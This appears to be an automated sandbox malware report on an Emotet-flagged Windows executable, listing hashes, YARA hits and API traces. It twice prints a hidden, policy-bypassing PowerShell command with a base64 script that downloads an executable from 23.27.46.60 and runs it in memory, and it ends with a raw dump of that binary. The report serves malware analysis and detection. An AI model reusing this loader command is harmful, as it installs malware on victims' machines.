popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

kinddevelopers.exe

Emotet Gen1 Generic Malware Malicious Library Antivirus UPX PE File PE64 CAB
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6403_us March 3, 2025, 2:43 p.m. March 3, 2025, 2:53 p.m.
Size 180.0KB
Type PE32+ executable (GUI) x86-64, for MS Windows
MD5 8199d03b6325b026657ac08f637e78de
SHA256 d6b04e732eceeab6e57bd5fdeafa214dcde714f4f9209ed858c5f391646a8b47
CRC32 9CFD23C8
ssdeep 3072:YMobR7ezAjLOZvmX1Z5vWp1icKAArDZz4N9GhbkENEkrzd:9eR7eammIp0yN90vE+
PDB Path wextract.pdb
Yara
  • Malicious_Library_Zero - Malicious_Library
  • PE_Header_Zero - PE File Signature
  • IsPE64 - (no description)
  • Win32_Trojan_Emotet_RL_Gen_Zero - Win32 Trojan Emotet
  • CAB_file_format - CAB archive file
  • Win32_Trojan_Gen_1_0904B0_Zero - Win32 Trojan Emotet
  • UPX_Zero - UPX packed file

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
23.27.46.60 Active Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

 0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

 buffer: C:\Users\test22\AppData\Local\Temp\IXP000.TMP>
console_handle: 0x0000000000000007
1 1 0

WriteConsoleW

 buffer: '■' is not recognized as an internal or external command, operable program or batch file.
console_handle: 0x000000000000000b
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0000000000437cc0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b357370
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b357370
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b357370
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b372320
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b372320
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b372390
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b372390
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b372390
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b372390
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b3724e0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b3724e0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b3724e0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b3722b0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b3722b0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b3722b0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b372550
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b372550
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b372550
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b372550
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b372550
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b372550
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b372550
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b372550
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b372be0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b372be0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b372be0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b3722b0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b3722b0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b372c50
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b372c50
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b3722b0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b3722b0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b3722b0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b372ef0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b372ef0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b372ef0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b372ef0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b39a090
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b39a090
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b372550
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b372550
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b372550
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b372550
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
pdb_path wextract.pdb
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
resource name AVI
suspicious_features Connection to IP address suspicious_request GET http://23.27.46.60/a0001/0228-01/positivereduce.exe
request GET http://23.27.46.60/a0001/0228-01/positivereduce.exe
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 2136
region_size: 983040
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000002580000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2136
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000025f0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2136
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef35b1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2136
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef382e000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2136
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef382e000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2136
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef382f000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2136
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef382f000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2136
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef382f000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2136
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef382f000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2136
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef382f000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2136
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef382f000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2136
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef382f000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2136
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef382f000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2136
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3830000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2136
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3830000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2136
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3830000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2136
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3830000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2136
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3830000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2136
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3831000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2136
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3831000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2136
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3831000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2136
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3831000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2136
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef382e000
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00032000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2136
region_size: 589824
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff10000
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff10000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff10000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2136
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff00000
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff00000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff000ea000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00022000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2136
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000025f2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2136
region_size: 12288
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000025f4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff000fa000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00033000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00034000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00122000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff000fd000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff000eb000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff000e2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00035000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00170000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00023000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00036000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00123000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff000ec000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff000e3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff0002a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2136
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00037000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2136
region_size: 16384
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000025f7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\IXP000.TMP\positivereduces.bat
file C:\Users\test22\AppData\Local\Temp\IXP000.TMP\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline powershell -WindowStyle Hidden -ep bypass -nop -Command "& {Invoke-Expression ([System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('JHdjPU5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQKJHdjLkhlYWRlcnMuQWRkKCdVc2VyLUFnZW50JywnTW96aWxsYS81LjAgKFdpbmRvd3MgTlQ7IFdpbmRvd3MgTlQgMTAuMDsgZW4tVVMpIFdpbmRvd3NQb3dlclNoZWxsLzUuMS4xOTA0MS41NDg2JykKJGJ5dGVzPSR3Yy5Eb3dubG9hZERhdGEoJ2h0dHA6Ly8yMy4yNy40Ni42MC9hMDAwMS8wMjI4LTAxL3Bvc2l0aXZlcmVkdWNlLmV4ZScpCiRhc3NlbT1bUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoJGJ5dGVzKQokYXNzZW0uRW50cnlQb2ludC5JbnZva2UoJG51bGwsJG51bGwp')))}"
Time & API Arguments Status Return Repeated

CreateProcessInternalW

 thread_identifier: 2140
thread_handle: 0x000000000000006c
process_identifier: 2136
current_directory: C:\Users\test22\AppData\Local\Temp\IXP000.TMP
filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
track: 1
command_line: powershell -WindowStyle Hidden -ep bypass -nop -Command "& {Invoke-Expression ([System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('JHdjPU5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQKJHdjLkhlYWRlcnMuQWRkKCdVc2VyLUFnZW50JywnTW96aWxsYS81LjAgKFdpbmRvd3MgTlQ7IFdpbmRvd3MgTlQgMTAuMDsgZW4tVVMpIFdpbmRvd3NQb3dlclNoZWxsLzUuMS4xOTA0MS41NDg2JykKJGJ5dGVzPSR3Yy5Eb3dubG9hZERhdGEoJ2h0dHA6Ly8yMy4yNy40Ni42MC9hMDAwMS8wMjI4LTAxL3Bvc2l0aXZlcmVkdWNlLmV4ZScpCiRhc3NlbT1bUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoJGJ5dGVzKQokYXNzZW0uRW50cnlQb2ludC5JbnZva2UoJG51bGwsJG51bGwp')))}"
filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x0000000000000068
1 1 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

 flags: 15
family: 0
111 0
section {u'size_of_data': u'0x0001e000', u'virtual_address': u'0x0000f000', u'entropy': 6.888643446187668, u'name': u'.rsrc', u'virtual_size': u'0x0001dcfa'} entropy 6.88864344619 description A section with a high entropy has been found
entropy 0.681818181818 description Overall entropy of this PE file is high
Data received HTTP/1.1 200 OK Date: Mon, 03 Mar 2025 05:51:54 GMT Server: Apache/2.4.58 (Ubuntu) Last-Modified: Fri, 28 Feb 2025 15:09:34 GMT ETag: "1d7200-62f3531ba2a41" Accept-Ranges: bytes Content-Length: 1929728 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdos-program MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELÑÁgà hþ…  @ à`…°…K ¸À  H.textf h `.rsrc¸ j@@.reloc Àp@Bà…HotˆŠàú*(*0£ þ8þ EoB8} 8Ôÿÿÿ( } ~÷{å:´ÿÿÿ& 8©ÿÿÿ|(+ ~÷{Ð:‡ÿÿÿ& 8|ÿÿÿ|( *0z þ8þ E+V8( ~÷{ª9Ïÿÿÿ& 8Äÿÿÿ(o  ~÷{Â:¤ÿÿÿ& 8™ÿÿÿ*&~þ*~*0/( }}|(+|( *0/( } } | (+| ( *0  þ8þ E8*($ o%  ~÷{û9& 8þ E8ݹÿÿÿ& ~÷{þ:& 8þ E8s# z ~÷{ì:[ÿÿÿ& 8Pÿÿÿ(Ck8&~þ*~*0¥  þ8þ ER,8M} ~÷{Á:Îÿÿÿ& 8Ãÿÿÿs ~÷{ò:¨ÿÿÿ& 8ÿÿÿo& þs' (+%() :8s# z*&~þ*~*0Ó  þ8þ E8*o- 98s# zo. & ~÷{9& 8þ E8ݨÿÿÿ& ~÷{¸9& 8þ E8s# z ~÷{©9Jÿÿÿ& 8?ÿÿÿ&V|8&~þ*~*(* *0« þ8þ E1U~8,r­pÐ (/ o0 s1 € þ8¶ÿÿÿ8H ~÷{:¡ÿÿÿ& 8–ÿÿÿ~9¦ÿÿÿ ~÷{¯:xÿÿÿ& 8mÿÿÿ~*~*€*j(#rïp~o2 t*&~þ*~*0™  þ8þ E?8(,*~ %986& ~÷{ä:»ÿÿÿ& 8°ÿÿÿ~þes3 %€  ~÷{Î9„ÿÿÿ& 8yÿÿÿ&(,*0™  þ8þ E?8:(,*~!%986& ~÷{:»ÿÿÿ& 8°ÿÿÿ~þfs3 %€! ~÷{é9„ÿÿÿ& 8yÿÿÿ0¤ sƒ }>=rÿpr%ps4 z<rgpr‹ps4 z{>: råps5 z(ã }? ÿÿÿY> ÿÿÿ8X (ã }@þ„s6 {?{@sµ *0” þ8þ E:8(0*~"%:6
